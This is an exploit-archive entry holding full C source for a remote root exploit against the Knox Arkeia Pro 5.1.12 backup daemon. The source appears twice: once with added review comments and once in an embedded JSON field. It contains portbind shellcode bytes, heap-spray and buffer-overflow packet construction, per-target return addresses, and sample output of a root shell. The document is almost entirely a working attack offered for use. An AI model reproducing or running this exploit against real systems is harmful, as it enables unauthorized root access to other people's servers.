ID 1337DAY-ID-8349
Type zdt
Reporter n/a
Modified 2003-09-20T00:00:00
Description
Exploit for linux platform in category remote exploits
=================================================
Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit
=================================================
/*
* Knox Arkeia arkiead local/remote root exploit.
*
* Portbind 5074 shellcode
*
* Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
*
* NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
* A previous request forces a large allocation of NOP's + shellcode in heap
* memory. Find additional targets by searching the heap for NOP's after a
* crash. safeaddr must point to any area of memory that is read/writable
* and won't mess with program/shellcode flow.
*
* ./ark_sink host targetnum
* [[email protected] dir]$ ./ark_sink 192.168.1.2 1
* [*] Connected to 192.168.1.2:617
* [*] Connected to 192.168.1.2:617
* [*] Sending nops+shellcode
* [*] Done, sleeping
* [*] Sending overflow
* [*] Done
* [*] Sleeping and connecting remote shell
* [*] Connected to 192.168.1.2:5074
* [*] Success, enjoy
* id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#define BUFLEN 10000 /* for getshell() */
#define LEN 280 /* overflow packet data section */
#define HEAD_LEN 8 /* overflow packet header */
#define NOP_LEN 10000 /* nop+shellcode packet */
#define ARK_PORT 617
#define SHELL_PORT 5074
#define NOP 0x90
#define NUMTARGS 2
/*
 * Target table, one entry per platform the author tested on. main() looks an
 * entry up by (target_num - 1), copies targret repeatedly into the overflow
 * data and places targsafe 12 bytes before its end. The table is terminated
 * by an all-zero sentinel whose os pointer is NULL; usage() walks entries
 * until it reaches that sentinel.
 */
struct {
    char *os;
    unsigned int targret;
    unsigned int targsafe;
} targets[] = {
    { .os = "Redhat 8.0", .targret = 0x80ecf90, .targsafe = 0x080eb940 },
    { .os = "Redhat 7.2", .targret = 0x80eddc0, .targsafe = 0x080eb940 },
    { .os = NULL, .targret = 0, .targsafe = 0 }
};
/*
 * portbind 5074
 *
 * Raw payload bytes. The file header describes them as a shell bound to TCP
 * 5074 (SHELL_PORT); that description is the author's and is not verified
 * here. Being a string literal, sizeof(shellcode) includes the terminating
 * '\0', and main() copies and sends exactly that many bytes after the NOP run.
 */
const char shellcode[] =
"\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08"
"\x8d\x4d\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14"
"\x66\xc7\x45\x16\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14"
"\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80\x40\x89\x45\x0c"
"\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0\x66"
"\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03"
"\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
/*
 * Convert a dotted-quad string or a host name into an IPv4 address in
 * network byte order.
 *
 * inet_addr() is tried first; when it cannot parse the string, the name is
 * looked up with gethostbyname() and the first address copied out. A failed
 * lookup is reported with herror() and terminates the process with status -1,
 * so the function only returns on success.
 *
 * gethostbyname() is obsolescent (getaddrinfo() is its replacement) and not
 * reentrant; it is tolerable in a single-threaded tool like this one.
 */
unsigned int resolve(char *hostname)
{
    u_long result = inet_addr(hostname);

    /* inet_addr() signals a parse failure with INADDR_NONE, i.e. (int)-1 */
    if ((int)result != -1)
        return result;

    struct hostent *entry = gethostbyname(hostname);
    if (entry == NULL)
    {
        herror("[!] gethostbyname");
        exit(-1);
    }
    /* h_length bytes (4 for AF_INET) overwrite the low part of result */
    memcpy(&result, entry->h_addr, entry->h_length);
    return result;
}
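/*
 * Open a TCP connection to hostname:portnum and return the connected socket.
 *
 * hostname is resolved with resolve(). If socket() or connect() fails the
 * errno text is printed to stderr and the process exits with status -1, so a
 * returned descriptor is always connected. A progress line is written to
 * stderr on success.
 *
 * Fixes relative to the original: socket() and connect() report through
 * errno, not h_errno, so perror() replaces the misused herror(); the socket()
 * failure message said "accept"; unused locals are gone and sin_zero is now
 * zero-initialised instead of left indeterminate.
 */
int isock(char *hostname, int portnum)
{
    /* designated initializer zeroes every member not named, including sin_zero */
    struct sockaddr_in sock_a = {
        .sin_family = AF_INET,
        .sin_port = htons(portnum),
    };
    int sock;

    sock_a.sin_addr.s_addr = resolve(hostname);

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0)
    {
        perror("[!] socket");
        exit(-1);
    }

    if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)) != 0)
    {
        perror("[!] connect");
        exit(-1);
    }

    fprintf(stderr, "[*] Connected to %s:%d\n", hostname, portnum);
    return sock;
}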
/*
 * Relay bytes between the local terminal and sock until the process is
 * killed: whatever arrives on sock is written to stdout, whatever arrives on
 * stdin is written to sock. The while(1) has no exit path, so the declared
 * int return value is never produced.
 *
 * Review notes (behavior left as written):
 *  - `input` is never cleared with FD_ZERO before the FD_SET calls, so each
 *    iteration starts from indeterminate stack contents (undefined behavior);
 *  - the select() result is not checked;
 *  - read() results are handed to write() unchecked: an error (-1) is passed
 *    as the length, and EOF (0) does not end the loop.
 */
int getshell(int sock)
{
    char buf[BUFLEN];
    int nread=0;
    while(1)
    {
        fd_set input;
        FD_SET(0,&input);
        FD_SET(sock,&input);
        select(sock+1,&input,NULL,NULL,NULL);
        if(FD_ISSET(sock,&input))
        {
            nread=read(sock,buf,BUFLEN);
            write(1,buf,nread);
        }
        if(FD_ISSET(0,&input))
            /* read() nested in write(): the byte count read from stdin is
             * used directly as write()'s length argument */
            write(sock,buf,read(0,buf,BUFLEN));
    }
}
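/*
 * Print the command-line synopsis and the target table to stderr, then exit
 * with status -1. Never returns.
 *
 * progname is the program name shown in the synopsis (callers pass argv[0]).
 * The original supplied no argument for the "%s" conversion, so the synopsis
 * printed whatever happened to be in the next argument slot; progname is now
 * passed, and the hard-coded "./" prefix is dropped because argv[0] already
 * carries the path the program was invoked with.
 */
int usage(char *progname)
{
    fprintf(stderr, "Usage:\n%s hostname target_num\n", progname);
    /* targets[] ends with a sentinel entry whose os pointer is NULL */
    for (int i = 0; targets[i].os; i++)
        fprintf(stderr, "Target %d: %s\n", i + 1, targets[i].os);
    exit(-1);
}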
/*
 * Entry point: ./ark_sink hostname target_num
 *
 * Opens two connections to ARK_PORT, sends the NOP-padded payload on the
 * first and the crafted header + data packet on the second, then connects to
 * SHELL_PORT and hands that socket to getshell(). Address constants come from
 * targets[target_num - 1]. Control falls off the end without a return
 * statement, which C99 treats as returning 0.
 *
 * Review notes (behavior left as written):
 *  - no write() return value is checked, so a short or failed send goes
 *    unnoticed;
 *  - `addr` is assigned but never used, and `port` is only ever ARK_PORT;
 *  - the two-byte length copy into head assumes a little-endian host.
 */
int main( int argc, char **argv)
{
    /* first 2 bytes are a type 74 request */
    /* last two bytes length */
    char head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
    char data[512];        /* only the first LEN (280) bytes are used */
    char sc_req[20000];    /* only NOP_LEN + sizeof(shellcode) bytes are used */
    char *host;
    unsigned int tnum;
    unsigned int safeaddr;
    unsigned int ret;
    int datalen = LEN;
    int port = ARK_PORT;
    unsigned int addr = 0; /* unused */
    int sock_overflow, sock_nops, sock_shell;
    int i;
    if (argc == 3)
    {
        host = argv[1];
        /* atoi() of a negative or non-numeric string yields 0 or a value
         * that wraps to a large unsigned; both are rejected below */
        tnum = atoi(argv[2]);
        if (tnum > NUMTARGS || tnum == 0)
        {
            fprintf(stderr, "[!] Invalid target\n");
            usage(argv[0]); /* usage() exits */
        }
    }
    else
    {
        usage(argv[0]);
    }
    /* 1-based on the command line, 0-based in targets[] */
    tnum--;
    ret = targets[tnum].targret;
    safeaddr = targets[tnum].targsafe;
    sock_overflow = sock_nops = sock_shell = 0;
    /* isock() exits on any failure, so both descriptors are connected here */
    sock_nops = isock(host, port);
    sock_overflow = isock(host, port);
    // build data section of overflow packet
    /* literal 0x90 is used here rather than the NOP macro defined above */
    memset(data, 0x90, datalen);
    /* ret is copied in host byte order, 4 bytes at a time, across all of data */
    for (i = 0; i < datalen; i += 4)
        memcpy(data+i, (char *)&ret, 4);
    // we overwrite a pointer that must be a valid address
    memcpy(data+datalen-12, (char *)&safeaddr, 4);
    // build header of overflow packet
    /* ntohs() and htons() perform the same byte swap; the result replaces the
     * two 0xff placeholder bytes at the end of head. Copying the first two
     * bytes of an int only yields the 16-bit value on a little-endian host. */
    datalen = ntohs(datalen);
    memcpy(head+6, (char *)&datalen, 2);
    // build invalid packet with nops+shellcode
    /* the extra 0x90 written at sc_req[NOP_LEN] is overwritten right away */
    memset(sc_req, 0x90, NOP_LEN+1);
    /* sizeof(shellcode) includes the literal's terminating NUL */
    memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));
    // send invalid nop+shellcode packet
    fprintf(stderr, "[*] Sending nops+shellcode\n");
    write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode));
    fprintf(stderr, "[*] Done, sleeping\n");
    sleep(1);
    close(sock_nops);
    // send overflow
    fprintf(stderr, "[*] Sending overflow\n");
    write(sock_overflow, head, HEAD_LEN);
    write(sock_overflow, data, LEN);
    fprintf(stderr, "[*] Done\n");
    fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
    sleep (1);
    close(sock_overflow);
    // connect to shell
    /* "Success" here only means the TCP connect to SHELL_PORT succeeded
     * (isock() exits otherwise); nothing about the peer is verified */
    sock_shell = isock(host, SHELL_PORT);
    fprintf(stderr, "[*] Success, enjoy\n");
    getshell(sock_shell);
}
# 0day.today [2018-02-05] #
{"published": "2003-09-20T00:00:00", "id": "1337DAY-ID-8349", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux platform in category remote exploits", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-02-05T03:13:47", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-05T03:13:47", "rev": 2}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-02-05T03:13:47", "edition": 2, "title": "Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit", "href": "https://0day.today/exploit/description/8349", "modified": "2003-09-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/8349", "references": [], "reporter": "n/a", "sourceData": "=================================================\r\nKnox Arkeia Pro 5.1.12 Backup Remote Root Exploit\r\n=================================================\r\n\r\n/*\r\n * Knox Arkiea arkiead local/remote root exploit.\r\n *\r\n * Portbind 5074 shellcode\r\n *\r\n * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.\r\n * \r\n * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.\r\n * A previous request forces a large allocation of NOP's + shellcode in heap\r\n * memory. Find additional targets by searching the heap for NOP's after a \r\n * crash. safeaddr must point to any area of memory that is read/writable\r\n * and won't mess with program/shellcode flow. 
\r\n *\r\n * ./ark_sink host targetnum \r\n * [[email\u00a0protected] dir]$ ./ark_sink 192.168.1.2 1\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Sending nops+shellcode\r\n * [*] Done, sleeping\r\n * [*] Sending overflow\r\n * [*] Done\r\n * [*] Sleeping and connecting remote shell\r\n * [*] Connected to 192.168.1.2:5074\r\n * [*] Success, enjoy\r\n * id\r\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n *\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n\r\n\r\n#define BUFLEN\t\t10000\t\t/* for getshell() \t\t*/\r\n#define LEN \t\t280\t\t/* overflow packet data section */\r\n#define HEAD_LEN \t8\t\t /* overflow packet header\t*/\r\n#define NOP_LEN\t\t10000\t\t/* nop+shellcode packet \t*/\r\n#define ARK_PORT\t617\r\n#define SHELL_PORT\t5074\r\n#define NOP \t\t0x90\r\n#define NUMTARGS\t2\r\n\r\nstruct {\r\n\tchar \t\t*os;\r\n\tunsigned int\ttargret;\r\n\tunsigned int\ttargsafe;\r\n} targets[] = {\r\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080eb940 },\r\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940 },\r\n\tNULL\r\n};\r\n\r\n\r\n/* portbind 5074 */\r\nconst char shellcode[] = 
\r\n\"\\x89\\xc3\\xb0\\x02\\xcd\\x80\\x38\\xc3\\x74\\x05\\x8d\\x43\\x01\\xcd\\x80\"\r\n\"\\x31\\xc0\\x89\\x45\\x10\\x40\\x89\\xc3\\x89\\x45\\x0c\\x40\\x89\\x45\\x08\"\r\n\"\\x8d\\x4d\\x08\\xb0\\x66\\xcd\\x80\\x89\\x45\\x08\\x43\\x66\\x89\\x5d\\x14\"\r\n\"\\x66\\xc7\\x45\\x16\\x13\\xd2\\x31\\xd2\\x89\\x55\\x18\\x8d\\x55\\x14\"\r\n\"\\x89\\x55\\x0c\\xc6\\x45\\x10\\x10\\xb0\\x66\\xcd\\x80\\x40\\x89\\x45\\x0c\"\r\n\"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x45\\x0c\\x89\\x45\\x10\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\"\r\n\"\\x75\\xf6\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\"\r\n\"\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n\r\nunsigned int resolve(char *hostname)\r\n{\r\n\tu_long \tip = 0;\r\n\tstruct hostent\t*hoste;\r\n\r\n\tif ((int)(ip = inet_addr(hostname)) == -1)\r\n\t{\r\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\r\n\t\t{\r\n\t\t\therror(\"[!] gethostbyname\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\r\n\t}\r\n\treturn(ip);\r\n}\r\n\r\n\r\nint isock(char *hostname, int portnum)\r\n{\r\n\tstruct sockaddr_in\tsock_a;\r\n\tint\t\t\tnum, sock;\r\n\tunsigned int\t\tip;\r\n\tfd_set\t\t\tinput;\r\n\r\n\tsock_a.sin_family = AF_INET;\r\n\tsock_a.sin_port = htons(portnum);\r\n\tsock_a.sin_addr.s_addr = resolve(hostname);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n\t{\r\n\t\therror(\"[!] accept\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\r\n\t{\r\n\t\therror(\"[!] 
connect\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tfprintf(stderr, \"[*] Connected to %s:%d\\n\", hostname, portnum);\r\n\treturn(sock);\r\n\t\r\n}\r\n\r\nint getshell(int sock)\r\n{\r\n\r\n\tchar\tbuf[BUFLEN];\r\n\tint\tnread=0;\r\n\r\n \twhile(1) \r\n\t{ \r\n \t\tfd_set input; \r\n \t\tFD_SET(0,&input); \r\n \t\tFD_SET(sock,&input); \r\n \t\tselect(sock+1,&input,NULL,NULL,NULL); \r\n \t\r\n\t\tif(FD_ISSET(sock,&input)) \r\n\t\t{ \r\n \t\t\tnread=read(sock,buf,BUFLEN); \r\n \t\t\twrite(1,buf,nread); \r\n \t\t} \r\n \t\tif(FD_ISSET(0,&input)) \r\n \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \r\n \t} \r\n}\r\n\r\nint usage(char *progname)\r\n{\r\n\tint \ti;\r\n\r\n\tfprintf(stderr, \"Usage:\\n./%s hostname target_num\\n\");\r\n\tfor (i = 0; targets[i].os; i++)\r\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\r\n\texit(-1);\r\n}\r\n\r\nint main( int argc, char **argv)\r\n{\r\n\r\n\t/* first 2 bytes are a type 74 request */\r\n\t/* last two bytes length */\r\n\tchar \t\thead[] = \"\\x00\\x4a\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[512];\r\n\tchar\t\tsc_req[20000];\r\n\tchar\t\t*host;\r\n\tunsigned int\t\ttnum;\r\n\tunsigned int \tsafeaddr;\r\n\tunsigned int \tret;\r\n\tint\t\tdatalen\t\t= LEN;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tunsigned int\taddr\t\t= 0;\r\n\tint\t\tsock_overflow, sock_nops, sock_shell;\r\n\tint \t\ti;\r\n\r\n\tif (argc == 3)\r\n\t{\r\n\t\thost = argv[1];\r\n\t\ttnum = atoi(argv[2]);\r\n\t\tif (tnum > NUMTARGS || tnum == 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[!] 
Invalid target\\n\");\r\n\t\t\tusage(argv[0]);\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\t\r\n\ttnum--;\r\n\tret = targets[tnum].targret;\r\n\tsafeaddr = targets[tnum].targsafe;\r\n\r\n\tsock_overflow = sock_nops = sock_shell = 0;\r\n\tsock_nops = isock(host, port);\r\n\tsock_overflow = isock(host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, 0x90, datalen);\r\n\tfor (i = 0; i < datalen; i += 4)\r\n\t\tmemcpy(data+i, (char *)&ret, 4);\r\n\t// we overwrite a pointer that must be a valid address\r\n\tmemcpy(data+datalen-12, (char *)&safeaddr, 4); \r\n\r\n\t// build header of overflow packet\r\n\tdatalen = ntohs(datalen);\r\n\tmemcpy(head+6, (char *)&datalen, 2);\r\n\r\n\t// build invalid packet with nops+shellcode\r\n\tmemset(sc_req, 0x90, NOP_LEN+1);\r\n\tmemcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));\r\n\r\n\t// send invalid nop+shellcode packet\r\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\r\n\twrite(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); \r\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\r\n\tsleep(1);\r\n\tclose(sock_nops);\r\n\r\n\t// send overflow\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, head, HEAD_LEN);\r\n\twrite(sock_overflow, data, LEN);\r\n\tfprintf(stderr, \"[*] Done\\n\");\r\n\tfprintf(stderr, \"[*] Sleeping and connecting remote shell\\n\");\r\n\tsleep (1);\r\n\tclose(sock_overflow);\r\n\r\n\t// connect to shell\r\n\tsock_shell = isock(host, SHELL_PORT);\r\n\tfprintf(stderr, \"[*] Success, enjoy\\n\");\r\n\tgetshell(sock_shell);\r\n\r\n}\r\n\r\n\r \n\n# 0day.today [2018-02-05] #"}
{}